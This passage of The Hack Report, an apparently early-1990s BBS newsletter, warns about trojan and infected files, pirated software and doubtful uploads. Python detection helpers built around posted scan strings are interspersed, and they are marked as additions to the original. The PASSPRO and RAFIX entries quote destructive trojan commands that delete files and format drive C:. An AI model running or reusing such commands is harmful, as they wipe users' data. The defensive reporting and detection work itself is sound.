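            if os.path.splitext(name)[1].upper() not in (".COM", ".EXE"):
                continue
            path = os.path.join(folder, name)
            with open(path, "rb") as handle:
                header = handle.read(EXE_OFFSET + 2)
            if has_marker(header):
                found.append(os.path.relpath(path, root))
    return sorted(found)


if __name__ == "__main__":
    # Constructed headers, not real programs.
    samples = {
        "COM with marker": b"\xE9\x10\x00BA" + b"\x90" * 8,
        "EXE with marker": b"MZ" + b"\x00" * 9 + b"BA" + b"\x00" * 16,
        "clean COM": b"\xE9\x10\x00\x90\x90",
    }
    for label, header in samples.items():
        print(f"{label:16} {has_marker(header)}")
```

  A hit is only a lead, as John's "chances are" suggests: a clean program
  can carry the same two bytes at that position.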

| Michael Toth (1:115/439.7) has received a report from a local SysOp, Matt
| Glosson of Audio Adrenalin, of a copy of TheDraw v4.60 (filename
| TDRAW460) that was uploaded to him with a few "modifications."  The file
| contained a "ZIP Comment" that had an ANSI bomb embedded in it, and also
| had a file called UFO!.COM inside the archive which would perform an
| unconditional format on your hard drive.  (Editorial - for Ian Davis'
| sake, I wish folks would leave TheDraw alone for a while.  No one program
| or programmer deserves this much abuse. - lj)

| Mike Wenthold (1:271/47) found a program under the filename GS2000 which
| contained the VCL 3 [Con] Virus.  The archive contains the following
| files:
|
|              Length    Date     Time    CRC      Filename
|             ======== ========= ====== ======== ============
|                 1984 22-Dec-91 01:40p 3527B16B GS2000.COM
|                  543 22-Dec-91 01:58p DB83A2C0 GSUNP.DOC
|             ======== ========= ====== ======== ============
|                 2527                           2 files.
|
| The compression method (on this ZIP archive) was not included in his
| data.  According to Dave Lartique (1:3800/22) and Chris Gramer
| (1:271/47), the program is an "unprotect" for MicroProse's game Gunship
| 2000.  This appears to be another isolated incident of an infected
| legitimate file.

  William Gordon (1:369/104) reports BEV105, a file that claims to be a
  "Beverly Hills 90210 Adventure Game."  This file contains 8 files, but
  two seem to be the real culprits:  DORINFO.DIR and INSTALL.COM.  The
  installation renames the DORINFO.DIR file to IDCKILL.EXE and invokes it.
  This program asks for some sort of wildcard according to William, then
  proceeds to delete everything on your drive that matches that wildcard.
  However, it doesn't stop there:  it continues on and deletes all .bat,
  .fon, .com, .zip, .sys, .ice, .ans, .arj, and .exe files.  William also
  says the file "comes with the following virii:  Bootkill and Genesis."

  A copy of this file was sent to Mr. White and Mr. Logan, who were able to
  confirm the behaviour that William reported.  For the complete results of
  their test, see the file BEV105.RES in the FILETSTS.LZH archive, included
  in the archive version of The Hack Report.

  More from HW Bill Lambdin: he forwards a message from Terry Goodman in
  the U'NI Net virus conference concerning the file SCOMP.  This was
  advertised as a compression utility with better compression than PKZip.
  The file passes all virus checkers unless you also check data files in
  addition to executables.  In short, the executable loads a file called
  SCOMP.DAT, which it uses to create a file called CASPER.COM, which is
  apparently the Casper virus.

  Another report from Bill concerns a file he located called TAXTIP93.
  This archive contains a file called TAXTIP93.DAT, which the executable
  file, TAXTIPS.EXE, renames to MOUSE.COM and tries to copy to your DOS and
  WINDOWS directory.  The new MOUSE.COM is infected with the ADA virus.

  Brian Chan (Internet, chanav@sfu.ca) found a file called PASSPRO, which
  was described with a very short line ("'Password,' or some other short
  word," according to Brian).  The archive contained these files:

                               PASS    .PA1
                               PASS    .PA2
                               PASS    .PA3
                               PASSWORD.COM

  Brian looked inside the .com file, which he says looks like a compiled
  batch file, and found these strings/commands:

      Please Wait While Loading;
      It may take in between 30seconds to 5 minutes
      To unshrink nessessary files
      Please Turn off Screen, and wait for the beep.
      If You do not, your screen might not function
      the way it should.
      Turn Off Screen now, and press the space bar.

      /C REN pass.pa1 pa.exe
      pass.pa2 /C DEL c:\*.*
      pass.pa2 /C DEL c:\dos\*.*
      /C REN pa.exe pass.pa1
      pass.pa3 FORMAT
      c:
      /C CLS

  As you can see, PASS.PA1 gets renamed to PA.EXE - the file, compressed
  with PKLite, is actually Microsoft's MS-DOS ATTRIB.EXE program.  PASS.PA2
  contains the single letter 'Y', and PASS.PA3 contains the single word
  'Yes'.  From the looks of things, this turns out to be a multipartite
  Trojan that attempts to format (what else?) your hard drive.

  Another multipartite Trojan was spotted by James Frazee (1:343/58), under
  the filename ADD_IT.  It contains these files:

                  Name of File    Size  Date
                  ADD_IT.ARJ     40888 02-11-93
                  =======================================
                  ADDIT1   DAT     34283 07-20-91   2:13a
                  ADD_IT   ANS       646 02-11-93   8:31p
                  ADDIT2   DAT     20634 04-09-91   5:00a
                  ADDIT    DOC       177 02-11-93   7:28p
                  ADDIT    COM      1391 02-11-93   8:14p
                  ADDIT3   DAT       138 02-11-93   8:13p
                  THEDRAW  PCK       650 02-11-93   8:31p

  When run, ADDIT.COM merges the three .DAT files into an .EXE file.  The
  end result was that the program deleted all of the files in the directory
  in which it was run.

  Matt Hargett (1:2430/1532) found a file called DRSLEEP which he says has
  a "cheap virii (sic) in it," but actually appears to be a Trojan.  When
  the executable, DRSLEEP.EXE, is run, it deletes your COMMAND.COM file.
  Not much to write home about, but nasty enough.  Thanks, Matt.

  Brent Thomas (1:202/226) says in the FidoNet DIRTY_DOZEN echo that his
  system was "taken down" by a file called DRAGON.  It claimed to be a
  Public Domain VGA and Sound Blaster supported game.  No symptoms were
  reported, except that he had to reformat his hard drive.

  Josh Burke (1:138/174) reports, via Charlie Sheridan (1:356/18), Travis
  Griggs (1:3807/8), and HW Bob Seaborn, a problem with the file PHYLOX2.
  In what might be an isolated incident, Josh says the file claimed to be a
  "really cool game, VGA gfx and SB sound."  However, the INSTALL program
  destroys hard disks.

| Bob Seaborn received a copy of this file and forwarded it to me - I have
| in turn forwarded it to Bill Logan and HW Jeff White for testing.  Stay
| tuned.

  John Balkunas (1:107/639) forwards information on GIFCHECK.  He reports
  that Lance Merlen (1:107/614) received an upload of this file, which,
  when checked with McAfee's ViruScan v100, reported over 5 viruses in the
  files in the archive.  No internal archive data was provided, so it is
  hard to say whether or not this is an isolated incident.

| Zack Jones (formerly 1:387/641: new address not yet known) reports a file
  called GAGS which was seen in the San Antonio area.  The file, described
  as "Some Christmas practical jokes," was analyzed by Bill Dirks
  (1:385/17) and confirmed as a Trojan.  The program grabs control of several
  interrupt vectors, including the critical error handler.  The only way to
  stop it once it starts is to hit the reset button or power down.

  When invoked, it displays a countdown from 8 to 0, which corresponds to
  drives H through A, in that order.  For each found drive, it overwrites
  the first 255 sectors with random data from a block of memory.  To add
  insult to injury, if drives B and A are empty, you are prompted to insert
  disks (so that they can be trashed as well).

  After this, the Trojan displays a message that includes something like,
  "the disk was trashed but it's only a joke and they are only kidding."
  It then prompts you to reboot, which is rather hard to do unless you have
  a bootable "panic disk" floppy on hand - you certainly won't be able to
  boot from your HD.

  Bill says that if your HD is smaller than 60 megs, you're better off
  trying to recover your disk from scratch.  Between 60-120 megs, you have
  a better chance of recovery via disk utilities:  over 120 megs, you
  should be able to accomplish a complete recovery if you're careful and
  you know what you're doing.

  Bill posted the following scan string that can be used to detect this
  Trojan - if your scanner can use external strings, be sure to read the
  instructions carefully before trying to add this:

               9A46027205B003B9FF00BA0000CD26

  If your scanner requires a name for the string, Bill suggests using
  "AlamoXmasTrojan."

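  For readers whose scanner cannot take external strings, here is Bill's
  scan string applied directly, as an added Python example that is not
  part of The Hack Report.  The function names are this example's own.

```python
import io
import os

# Scan string exactly as posted in the report.
SCAN_STRING = "9A46027205B003B9FF00BA0000CD26"
SIGNATURE = bytes.fromhex(SCAN_STRING)
# Its last ten bytes are the 8086 instructions MOV AL,03 / MOV CX,00FF /
# MOV DX,0000 / INT 26h (DOS absolute disk write): a 255-sector write
# starting at sector 0, which fits the behaviour described above.


def find_signature(stream, signature=SIGNATURE, chunk_size=64 * 1024):
    """Return every absolute offset of signature in a binary stream.

    Reads in chunks and carries len(signature) - 1 bytes over, so a match
    that straddles a chunk boundary is found and none is counted twice.
    """
    overlap = len(signature) - 1
    offsets, tail, base = [], b"", 0   # base = file offset of buf[0]
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            return offsets
        buf = tail + chunk
        pos = buf.find(signature)
        while pos != -1:
            offsets.append(base + pos)
            pos = buf.find(signature, pos + 1)
        tail = buf[-overlap:] if overlap else b""
        base += len(buf) - len(tail)


def scan_tree(root):
    """Map relative path -> match offsets for every file under root.

    There is no extension filter: as the SCOMP report shows, a payload
    can sit in a data file that an executables-only scan never opens.
    """
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            with open(path, "rb") as handle:
                offsets = find_signature(handle)
            if offsets:
                hits[os.path.relpath(path, root)] = offsets
    return hits


if __name__ == "__main__":
    # Constructed buffer: filler bytes around the scan string, not the Trojan.
    sample = b"\x90" * 5 + SIGNATURE + b"\x00" * 10
    print(find_signature(io.BytesIO(sample), chunk_size=8))
```
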
  This Trojan report comes from an article in MacWeek magazine, Volume 7,
  Number 2, issued January 11, 1993.  The article, posted in the FidoNet
  VIRUS_INFO echo by Robert Cummings, states that a program called CPro
  1.41.sea, claiming to be a new version of Compact Pro (a Macintosh
  shareware compression utility), will reformat any floppy in drive 1 and
  tries to reformat the user's start-up hard drive when launched.

  The file can be identified by a 312K sound resource file called "log
  jingle," which is digitized sound from the Ren and Stimpy cartoons.

  Frans Hagelaars (2:512/2) has posted a message in several echos
  concerning a Trojan version of the Blue Wave Offline Mail Reader that had
  been circulating in his area.  According to the warning, the "hacked"
  version attacks your hard drive boot sector and partition table, and will
  then "play tricks" with RemoteAccess userlists and phone numbers.

  The filename of this version was not given in the report, nor was it made
  clear whether the BBS door or the Reader was involved.  If you have any
  questions about the security of your copy, remember that you can always
  obtain a safe copy from the BBS of the author, George Hatchew, at FidoNet
  address 1:2240/176, phone number 1-313-743-8464, or from any of the
  official distribution sites (which I believe are listed in the
  documentation for the program).

  Other previously reported Trojans:

  Filename  Claimed use/Actual activity/Reporter(s)
  ========  ==============================================================
  AANSI100  Claims to add Auto-ANSI detect to Telegard BBSs - contains
            something called the "Malhavoc Trojan," which displays a verse
            from a Toronto band and attacks files/sectors on drives C:
            through F:.  Reported by HW Todd Clayton and by George Goode
            (1:229/15).

  ANSISCR   VGA BBS ad - contains a self-extracting archive of the Yankee
            Doodle and AntiChrist viruses.  Can trash hard drives as well
            through Trojan behaviour.  Reported by Bill Dirks (1:385/17),
            and under the filename RUNME by Stephen Furness (1:163/273).

  AVENGER   Advertised as an "amazing game that supports all kind of sound
            cards...."  Contains 2 internal password-protected .ZIP format
            files, AVENGER2.DAT and AVENGER3.DAT, which are expanded by
            the program to the files RUNTIME1.COM (N1 virus) and
            RUNTIME2.COM (Anthrax virus).  From Reinhardt Mueller, via
            HW Bill Lambdin.

  BATMAN    No claim reported - searches your DOS path and tries to "delete
            the executable file that loads WildCat BBSs."  Reported by
            James Powell (Intelec PC-Security Conf.), via HW Bill Lambdin.

  CHROME    Possible isolated incident - contains a file, FGDS.COM, which
            contains text that says "Skism Rythem Stack Virus-808."
            Reported by Richard Meyers and forwarded by Larry Dingethal
            (1:273/231).

  DBSOUND   Possible isolated incident - claimed update of the Drum
            Blaster .MOD file player.  Deletes all files in the current
            directory and all of its subdirectories.  From "Khamsin #1
            @9168*1", forwarded by HW Ken Whiton and HW Bill Dennison,
            from Ken Green of the CentraLink BBS.

  GRAFIX    Possible isolated incident - contains the file WAIT.COM, which
            is a renamed copy of DELDIR.COM, a directory remover and file
            deletion tool.  Reported by Andreas Reinicke (2:284/402).

  LOGIM613  Possible isolated incident - one internal file, MOUSE.COM,
            reports as being infected with the VCL virus when checked with
            McAfee's ViruScan v95.  Reported by Mike Wenthold (1:271/47).

  MUVBACK   Claimed keyboard utility - actual ANSI bomb that remaps the D
            key of your keyboard to invoke DEBUG and create a couple of
            Trojans from script files.  Reported by Bill Dirks.

  OPTIBBS   Aimed at RemoteAccess BBS systems - archives your USERS.BBS
            list and places it in your download directory.  Reported by
            HW Nemrod Kedem.

  QOUTES    Not a misspelling - claimed Christmas quotation generator.
            Overwrites the first 128 cylinders of your first HD, requiring
            a low level format to overcome the damage (IDE drives may need
            to go back to the factory).  Reported by Gary Marden
            (2:258/27).

  QSCAN20   Claimed small virus scanner - when run, identifies itself as
            "being a stealth bomber" and attacks your hard drive's FAT.
            Reported by Art Mason (1:229/15).

  RA111TO2  Claims to upgrade RemoteAccess 1.11 to 2.0 - acts similarly to
            the OPTIBBS file reported above.  Reported by Peter Janssens
            (2:512/1).

  RAFIX     "Fixes little bugs" in RemoteAccess - program contains the
            string "COMMAND /C FORMAT C:" internally.  Reported by Sylvain
            Simard (1:242/158).

  RAMANAGE  Claimed USERS.BBS manager for RemoteAccess - yet another
            file that makes an archive of this file (MIX1.ARJ or WISE.ARJ)
            and places it in a download directory.  Reported by Peter
            Janssens.

            NOTE - Peter Hoek (2:281/506.15) reports a program that does
            the same thing, but uses the archive name RUNNING.ARJ to
            hold the USERS.BBS file.  No name of the Trojan was supplied.

  REAPER    ANSI bomb - remaps the keyboard to force file deletion and
            hard disk formatting - also generates insults.  Reported by
            Victor Padron (1:3609/14), via Rich Veraa (1:135/907).

  REDFOX    Batch file which deletes all DOS and system files.  Reported
            by Mike Wenthold.

  ROLEX     Possible isolated incident of an infection by the Keypress
            [Key] virus.  Reported by David Gibbs, via Michael Toth
            (1:115/220).

  SBBSFIX   Tries to format drive C: - contains two files, SBBSFIX.EXE and
            COM_P.OVL.  Reported by Clayton Mattatall (1:247/400).

  SPEED     Claims to "check your PC speed" - actually deletes all files
            on drive C:, including directories.  Reported by HW Nemrod
            Kedem.

  XYPHR2    No claim - contains the Power Pump companion virus (documented
            in the 1992 Full Archive of this report).  Reported by Mark
            Histed (1:268/332).

  YPCBR101  A copy of this file, uploaded to Simtel-20 and the oak mirror
            on archie.au, contained an infection of the Dark Avenger
            virus in the file YAPCBR.EXE.  Was supposed to be re-released
            as a clean archive.  Reported by John Miezitis (Internet,
            John.Miezitis@cc.utas.edu.au).

  =========================================================================

                        Pirated Commercial Software

  Program                 Archive Name(s)     Reported By
  =======                 ===============     ===========
  3-D Pool                3DPOOL              Michael Gibbs (via Bill
                                               Lambdin)

  Alone in the Dark       ALONEDEM            Mark Mistretta (1:102/1314)
   (full game-not a demo)

| ArcMaster (registered)  AM91REG             HW Scott Raymond

| Arctic Fox (game, by    AFOX                from the Meier/Morlan List,
|  Electronic Arts)                            confirmed by Emanuel Levy
|                                              (1:266/63) and Brendt Hess
|                                              (1:105/362)

  Atomix (game)           ATOMIX_             HW Matt Kracht

  A-Train by Maxis        ATRAIN1  through    Chris Blackwell of Maxis
                          ATRAIN6, also        (zoinks@netcom.com)
                          A-TRAIN1 through
                          A-TRAIN6

  Battle Chess            CHESS               Ron Mahan (1:123/61)

| BeetleJuice (game)      BEETLE              Mark Harris (1:121/99)
|                         BETLEJUC            Jason Robertson (1:250/802.2)
                          BJUICE              Alan Hess (1:261/1000)
                          BJ                  Bill Blakely
                                               (RIME Shareware echo)
                          BTLJWC              the Hack Squad
                                               (1:382/95)

| Budokan: the Martial    BUDOKAN             Michael Gibbs (Intelec, via
|  Spirit (game)                               HW Bill Lambdin)

  Check-It PC             CHECKIT             HW Bert Bredewoud
   Diagnostic Software    CHKIT20             HW Bill Lambdin

| Cisco Heat (game)       CISCO               Jason Robertson

  Commander Keen          _1KEEN5             Scott Wunsch (1:140/23.1701)
   (part 5)

  Copy II PC              COPYPC70            Ryan Park (1:283/420)

  Darkside (game)         DARKSIDE            Ralph Busch (1:153/9)

  DiskDupe Pro v4.03      DD403PRO            Jan Koopmans (2:512/163)

  Energizer Bunny Screen  ENERGIZR            Kurt Jacobson, PC Dynamics,
   Saver for Windows                           Inc., via HW Bill Dennison

  Family Feud (game)      FAM-FEUD            Harold Stein (1:107/236)

  F-Prot Professional     FP206SF             Mikko Hypponen
                                               (mikko.hypponen@compart.fi)

| GifLite 2.0 (regist.)   GL2-ECR             HW Scott Raymond

  Golden Axe (game)       GOLDAXE             Harold Stein

  Ian Bothams Cricket     IBCTDT              Vince Sorensen (1:140/121)

| Intelcom Modem Test     TESTCOM             from the Meier/Morlan List,
|  Utility (dist. with                         confirmed by Onno Tesink
|  Intel modems)                               (RIME, via HW Richard
|                                              Steiner)

  Killing Cloud (game)    CLOUD               Mike Wenthold

| Kings of the Beach      VBALL               Jason Robertson
   (game)

  Life & Death (game)     L&D1                Harold Stein
                          L&D2

  MegaMan (game)          MEGAMAN             Emanuel Levy (1:266/63)

| Microsoft Flight        FS                  Michael Gibbs (Intelec, via
|  Simulator                                   HW Bill Lambdin)

  Oh No, More Lemmings    ONMLEMM             Larry Dingethal (1:273/231)
   (complete-not demo)

  Over the Net            OTNINC1             Tim Sitzler (1:206/2708)
   (volleyball game)

| PKLite (registered)     PKL15REG            HW Scott Raymond

  PKZip v2.04c            PK204REG            HW Scott Raymond
   (Registered)

  PKZip v2.04c            PKZCFG              Mark Mistretta (1:102/1314)
   Configuration Editor

  PKZip v2.04e            PK204ERG            HW Scott Raymond
   (Registered)

  PKZip v2.04g            PKZ204R             HW Bill Dennison
   (Registered)

  PrintShop               PSHOP               Michael Gibbs, Intelec, via
                                               HW Bill Lambdin

  Psion Chess             3D-CHESS            Matt Farrenkopf (1:105/376)

| Q387 (registered)       Q387UTG             Michael Toth (1:115/439.7)

  QModem Pro              QMPRO-1             Mark Mistretta
                          QMPRO-2

  Rack 'Em (game)         RACKEM              Ruth Lee (1:106/5352)

| Microsoft Ramdrive      RAMDRIVE            Barry Martin (Intelec, via
|                                               HW Bill Lambdin)

  Sequencer Plus Pro      SPPRO               Tom Dunavold (Intelec,
                                               via Larry Dingethal)

  Shadow Warriors (game)  SHADOWG             Mark Mistretta

  Sharky's 3D Pool        POOL                Jason Robertson (1:250/801)

  Shez (Registered)       SHEZ84R             Eric Vanebrick (2:291/712)
                          SHEZ85R             HW Scott Raymond
|                         SHEZ87R
|                         SHEZ88R
|                         SHEZ89R

  SideKick 2.0            SK3                 Harold Stein

| SimCity (by Maxis)      SIM_CITY            Kevin Brott (Internet,
|                                       dp03%ccccs.uucp@pdxgate.cs.pdx.edu)
                          SIMCTYSW            Scott Wunsch

| Smartdrive Disk Cache   SMARTDRV            Barry Martin (Intelec, via
|                                               HW Bill Lambdin)
                          SMTDRV40            Michael Toth (1:115/220)

  Star Control Vol. 4     STARCON             Carson M. Hanrahan
                                               (CompuServe 71554,2652)

  Streets on a Disk       STREETS             Harvey Woien (1:102/752)

  Teledisk (files         TDISK214            Mark Mistretta
   dated after Apr. 1991)
|                         TELE214R            Staale Fagerland (Internet,
|                                            staale.fagerland@euronetis.no)

  Vegas Casino 2 (game)   VEGAS2              The Hack Squad

| VPic v6.0 (registered)  VPIC60CR            HW Scott Raymond

  WinWay Resume for       WINRES              Erez Carmel (CompuServe,
   Windows                                      70523,2574)

  World Class Rugby       WCRFNTDT            Vince Sorensen

| ZipMaster (registered)  ZM31REG             HW Scott Raymond

  =========================================================================

                      ?????Questionable Programs?????

  First, a quick note - this section and the Information, Please section
  are the only ones that have any information carried over from the 1992
  report.  This is because many of the listings in these sections were not
  completely resolved when the last 1992 issue was published.  As usual,
  if anyone has any additional information on anything listed in these
  sections, _please_ help!

| HW Bill Lambdin says he found a file in the Knoxville, Tennessee area
| called BIBLEPR (no description available) that appears a bit suspicious.
| The file contents are:
|
|               Length  Time    CRC-32  Attr  Name
|               ------  ----   -------- ----  ----
|                34176  11:26  d267f5de --w-  BIBLEPR.COM
|               158493  00:04  4298ac2d --w-  DATAPR-0.DAT
|               158493  00:04  d87adf4b --w-  DATAPR-1.DAT
|               158493  00:08  1213c6b3 --w-  DATAPR-2.DAT
|               159764  00:08  38d7cc06 --w-  DATAPR-3.DAT
|                 1572  24:05  3a60c80e --w-  BIBLEPR.DOC
|               ------                        -------
|               670991                              6
|
| When BIBLEPR.COM executes, Bill says it displays the following message:
|
|                       Greets from DOA!
|
|       Don't say I didn't warn you! You are also busted!
|
|       Expect a visit from the SPA!
|
|       Omni, I will avenge you!
|
| Bill's disassembly shows the file contains two INT 26 calls, which are
| DOS Absolute Disk Write instructions.  He said that if it contains a
| virus, he was unable to get it to replicate.  A copy of the archive has
| been sent to Glenn Jordan at Datawatch Software for testing.
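
  The two checks this report suggests, as an added example that is not part
  of the original report: match unpacked files against a listing in the
  layout printed above by length and CRC-32, and flag INT 26h byte pairs in
  a .COM image.  The function names and sample bytes are constructed, and
  the listing's CRC-32 is assumed to be the standard one that zlib computes.

```python
import re
import zlib

# One member line in the layout the report prints: Length  Time  CRC-32  Attr  Name
MEMBER_LINE = re.compile(
    r"^(\d+)\s+\d{2}:\d{2}\s+([0-9a-fA-F]{8})\s+\S{4}\s+(\S+)\s*$"
)
INT_26 = b"\xCD\x26"      # encoding of INT 26h, the DOS absolute disk write
COM_LOAD_OFFSET = 0x100   # DOS loads a .COM image at offset 0100h


def parse_listing(text):
    """Return {(length, crc32): reported_name}; headers, rules and totals are skipped."""
    reported = {}
    for line in text.splitlines():
        match = MEMBER_LINE.match(line.lstrip("| "))  # drop change bar and indent
        if match:
            length, crc, name = match.groups()
            reported[(int(length), int(crc, 16))] = name
    return reported


def find_int26(image):
    """Return (file_offset, load_address) for every CD 26 byte pair.

    A byte match is a lead, not proof: the pair can also sit in data or in
    another instruction's operand, so confirm each hit in a disassembler.
    """
    hits, pos = [], image.find(INT_26)
    while pos != -1:
        hits.append((pos, pos + COM_LOAD_OFFSET))
        pos = image.find(INT_26, pos + 1)
    return hits


def triage(members, listing_text):
    """Check unpacked members (name -> bytes) against a report listing.

    Matching is on length plus CRC-32, not on name, so a renamed copy is
    still recognised. CRC-32 is not collision resistant: a match rules out
    accidental differences, not a deliberately forged file.
    """
    reported = parse_listing(listing_text)
    findings = {}
    for name, data in members.items():
        is_com = name.upper().endswith(".COM")
        findings[name] = {
            "reported_as": reported.get((len(data), zlib.crc32(data))),
            "int26_hits": find_int26(data) if is_com else [],
        }
    return findings


def listing_line(name, data):
    """Format one member line for the constructed sample listing below."""
    return f"| {len(data):>20}  00:00  {zlib.crc32(data):08x} --w-  {name}"


# Constructed sample data (not the real BIBLEPR files): filler bytes around
# two CD 26 pairs, then a data string that happens to contain a third pair.
SAMPLE_COM = bytes.fromhex("9090CD2190CD269090CD26C3") + b"MSG\xCD\x26$"
SAMPLE_DOC = b"constructed documentation text\r\n"
SAMPLE_LISTING = "\n".join([
    "|               Length  Time    CRC-32  Attr  Name",
    "|               ------  ----   -------- ----  ----",
    listing_line("SUSPECT.COM", SAMPLE_COM),
    listing_line("SUSPECT.DOC", SAMPLE_DOC),
    "|               ------                        -------",
])
# The same program as it might appear on a board under another name.
LOCAL_MEMBERS = {"GAME.COM": SAMPLE_COM, "README.TXT": b"unrelated file"}

if __name__ == "__main__":
    for name, finding in triage(LOCAL_MEMBERS, SAMPLE_LISTING).items():
        print(name, finding)
```

  The third hit in the sample lies inside a data string, which is why each
  offset still needs checking in a disassembler.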

| Bud Webster (1:264/165.7) reports an Apogee game being distributed under
| the filename BLOCK5.ZIP.  He says that the game displayed a message that
| said, "This game is not in the public domain or shareware."  There was
| only an .EXE file in the archive, and no documentation.
|
| Matthew Waldron (RIME Shareware Conf., via HW Richard Steiner) and Dan
| Stratton (via HW Ken Whiton) state that this program was part of an
| Apogee disk called the "Super Game Pack," and that it is a game called
| "Block Five."  Joe Siegler (1:124/9006), the online support
| representative for Apogee Software Productions, confirms this, and states
| that the majority of the games on this disk, including this one, have
| been officially discontinued.  No word yet on whether they may be
| distributed via BBS systems - watch this space for updates.

| Here's an interesting point, brought to my attention by HW Richard
| Steiner and John Weiss of the RIME Shareware Conference.  In previous
| issues, I have listed two files, QM60IST1 and QM60IST2 (reported by
| Francois Thunus, 2:270/25), as pirated copies of QModem v6.0.  However,
| Richard and John quite correctly point out that there was no release of
| QModem v6.0 - the program changed to QModem Pro after v5.
|
| From what Francois reported, I believe that what he saw was indeed Qmodem
| Pro, now a commercial-only program.  However, it was "released" under the
| above filenames.  So, is it a Hack?  Pirated File?  Or what?  Doesn't
| matter - it shouldn't be distributed.  Thanks, Richard and John, for
| making me fully engage my brain for a change. <grin>

| Jack Cross (1:3805/13) forwarded a copy of a DEBUG script posted in the
| FidoNet BATPOWER echo.  The script, which has created a great deal of
| discussion in that echo, created an archive (LZH) of the program
| TinyCache (filename TNYCACHE), a small disk cache program.
|
| A couple of folks who ran the program state that this is not a legitimate
| file.  In fact, it appears (from their reported symptoms) to be a Trojan.
| Destroyed FATs and reformatted hard drives have been reported after this
| program is run.
|
| I ran the script through DEBUG and un-archived the TNYCACHE.COM file.
| Afterwards, I checked it for viruses and looked at it with Vern Buerg's
| LIST Enhanced.  At first glance, the file doesn't even look like a real
| program:  it appears to be a corrupted file of some sort, and bears no
| resemblance to any .COM file I have ever seen.  If it is in fact a
| corrupted file, then the damage it could cause if run would be
| unpredictable at best.  My guess is that the file might not be an
| intentional dirty trick, but that the person who distributed it may have
| some cross-linked clusters on their hard drive.
|
| As I have said before to folks who contact Hack Central Station, I'm a
| reporter, not an AV expert:  my analysis is not as reliable as one coming
| from a real expert.  I have been offline for several days due to
| circumstances beyond my control, so I might have missed a report from
| Jack on this.  If not, I will forward a copy for testing.

  HW Bill Dennison captured a message from Marshall Dudley (Data World BBS,
  (615)966-3574) in the ILink VIRUS FILE conference about the archive
  ASCDEMO.  Marshall says that McAfee's ViruScan doesn't detect any
  infection until after you run it and it has infected other files.  No
  further information was supplied, other than the internal filenames
  (ASCDEMO.DOC and ASCDEMO.EXE).  I need further data on this before I can
  list it in the Trojan Wars section, so please advise if you have any.

  Emanuel Levy (1:266/63) wrote in about the file IM, reported by Michael
  Santos in the Intelec Net Chat conference and listed in the 1992 Full
  Archive edition of The Hack Report.  Michael's report was a "hearsay"
  report from one of his friends, and stated that the IM screen saver file
  caused a viral infection.

  Emanuel says the file is an "outer space screen saver," currently under
  the filename IM17.  Scott Wunsch (1:140/23.1701) says the program name is
  "Inner Mission," and he currently has version 1.6.  In both cases, the
  files were clean.

  So, it looks like either Michael's friend's system became infected from a
  different source than the IM file, or that an isolated incident of an
  infected IM is involved.  No way to tell at this writing.

  Long time readers of this report will remember a question concerning the
  status of a screen saver called TUNNEL.  Ove Lorentzon (2:203/403.6) and
  Bill Roark (RIME address BOREALIS, Shareware conference, via HW Richard
  Steiner) both stated that the program was an internal IBM test program
  and was not intended for outside distribution.

  Your Hack Squad has received word from the author of the program, Dan
  Butterfield (Internet, danielb@vnet.ibm.com), that as far as he is aware,
  the program has never been released to the general public.  According to
  Dan, "it is still owned by IBM, and as such has been given the IBM
  security classification 'IBM Internal Use Only' which means what it says:
  the program is not for distribution to non-IBM employees."

  Dan also says that several other "Internal Use Only" programs have been
  "leaked" to the outside world, which implies that these files should not
  be posted for download.  One such program was originally called Dazzle
  (NOT to be confused with the other popular DAZZLE screensaver), but has
  entered BBS distribution under the filename O-MY-GOD.  Another is a
  program that is usually included inside other archives:  the program name
  is PLAYANI.  Dan says this has been distributed "along with various
  animations," and also falls under the same Internal classification.

  A prime example of this is an archive called BALLS (not what you think).
  This is an animation of multiple chrome spheres rotating around each
  other above a red and white checkerboard platform.  In this case, both
  the player (PLAYANI) _and_ the animation are the property of IBM and are
  not intended for BBS distribution.

  Again, to quote Dan, "None of these programs are for external
  distribution; all are owned by IBM and are only for use inside IBM by IBM
  employees."  Thanks to Dan for all of his help.

  Donn Bly has cleared up the question on the status of the Sydex program
  TeleDisk, first raised by Mark Draconis (1:120/324) and Kelvin Lawson.
  Donn was kind enough to mail a copy of a letter sent to him by Sydex
  explaining that Teledisk is no longer shareware.  Here is an excerpt from
  the letter:

       "Effective April 1991, TeleDisk is no longer a shareware
       product.  After long consideration, we decided to
       discontinue our offering of the shareware edition of
       TeleDisk, and license it only as a commercial product.

       "Commercial licenses of TeleDisk are available from Sydex at
       $150 a copy.  All shareware distributors and BBS sysops who
       take time to check their sources are requested to remove
       TeleDisk from shareware distribution."

  The letter is signed by Miriam St. Clair for Sydex.  To summarize, Sydex
  is no longer accepting shareware registrations for TeleDisk, and asks
  that it not be made available for download from BBS systems.

  Thanks to Donn for his help in this matter.

  HW Ken Whiton forwards messages from Harold Stein, Gary Rambo, and Gwen
  Barnes of Mustang Software, Inc., about a "patch" program aimed at
  OffLine Xpress (OLX) v1.0.  The patch is supposed to allow OLX to
  read and reply to Blue Wave packets, along with a lot of other seemingly
  unbelievable feats.  Gwen Barnes did not seem to know of the patch, but
  published the following advice in the WildNet SLMROLX conference to
  anyone considering trying it:

    1. Make a complete backup of your system.
    2. Make sure you've got all the latest SCAN stuff from McAfee
    3. Try it, keeping in mind that it more than likely does nothing
       at all, or is a trojan that will hose your system.
    4. Get ready to re-format and restore from backups if this is in
       fact the case.

  No filename was given for this patch.  If anyone runs across a copy of
  it, please contact one of The HackWatchers or myself so that we can
  forward a copy to MSI for testing.

  HW Bill Lambdin reports that someone has taken all of McAfee Associates'
  antiviral programs and combined them into one gigantic (over 700k)
  archive.  He did not say whether the files had been tampered with, but he
  did send a copy to McAfee for them to dissect.  The file was posted under
  the filename MCAFEE99.  I would not suggest downloading this file:  as a
  matter of fact, this reporter prefers to call McAfee's BBS directly when
  a new version of any of their utilities comes out.  I highly recommend
  this method, since it ensures that you will receive an official copy.

  HW Matt Kracht forwarded a message from Stu Turk in the DR_DEBUG
  echo about possible Trojans going around as PKZIP 2.21 and/or 2.22.  Stu
  also says that there is a warning about these in circulation.  If you
  have a copy of this warning, please send a copy to Hack Central Station
  (1:382/95).

  =========================================================================

                            Information, Please

  This is the section of The Hack Report where your Hack Squad asks for
  _your_ help.  Several reports come in every week, and there aren't enough
  hours in the day (or fingers for the keyboards) to verify them all.  Only
  with help from all of you can The Hack Report stay on top of all of the
  weirdness going on out there in BBSLand.  So, if you have any leads on
  any of the files shown below, please send them in: operators are standing
  by.

